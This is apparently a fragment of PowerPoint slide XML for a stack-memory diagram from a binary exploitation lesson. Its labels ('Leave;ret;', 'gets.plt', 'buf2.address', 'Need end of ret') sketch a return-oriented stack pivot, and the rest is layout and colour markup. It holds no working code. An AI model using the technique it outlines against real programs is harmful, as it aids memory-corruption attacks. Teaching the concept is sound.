            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1810" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10804839" y="673820"/>
              <a:ext cx="942862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Low</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1811" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10804852" y="9055820"/>
              <a:ext cx="10444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High</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1812" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7062861" y="856568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13" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7062861" y="7727480"/>
              <a:ext cx="3635017" cy="84074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14" name="Leave;ret;"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7905737" y="5319971"/>
              <a:ext cx="213743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942192"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Leave;ret;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1815" name="gets.plt"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8137650" y="4465876"/>
              <a:ext cx="1578209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gets.plt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1816" name="buf2.address"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7600677" y="6174065"/>
              <a:ext cx="274755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9300"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>buf2.address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1817" name="Do some thing"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7354343" y="1102281"/>
              <a:ext cx="305205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Do some thing</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1818" name="Need end of ret"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7252433" y="1927801"/>
              <a:ext cx="325587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Need end of ret</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1819" name="Do some thing"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7354343" y="2779091"/>
              <a:ext cx="305205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Do some thing</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1820" name="buf2 - 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8147174" y="3636361"/>
              <a:ext cx="1654558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buf2 - 4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1821" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5331144" y="1438812"/>
              <a:ext cx="1210133" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="101600" cap="flat">
              <a:solidFill>
                <a:srgbClr val="D6D6D6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2" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5377687" y="1392272"/>
              <a:ext cx="1" cy="5091059"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="101600" cap="flat">
              <a:solidFill>
                <a:srgbClr val="D6D6D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3" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4043210" y="6492835"/>
              <a:ext cx="1385278" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="101600" cap="flat">
              <a:solidFill>
                <a:srgbClr val="D6D6D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4" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12591930" y="1359310"/>
              <a:ext cx="1121232" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="101600" cap="flat">
              <a:solidFill>
                <a:srgbClr val="D6D6D6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5" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="12567968" y="1313590"/>
              <a:ext cx="1" cy="4354460"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="101600" cap="flat">
              <a:solidFill>
                <a:srgbClr val="D6D6D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6" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11049651" y="5638740"/>
              <a:ext cx="1565509" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="101600" cap="flat">
              <a:solidFill>
                <a:srgbClr val="D6D6D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7" name="Do some thing"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14653341" y="1040540"/>
              <a:ext cx="305205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Do some thing</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1828" name="Need end of ret"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14551431" y="1867759"/>
              <a:ext cx="325587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Need end of ret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Demo"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10340821" y="6075679"/>
            <a:ext cx="3689659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333B3B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737572"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="4F0375"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="A7A7A7"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="535353"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="E2BB19"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="EFD562"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="AA8C14"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="868789"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="B1B2B4"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="333C3C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3757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3757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2BB19"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="EFD562"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="AA8C14"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="868789"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="B1B2B4"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="333C3C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3757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3757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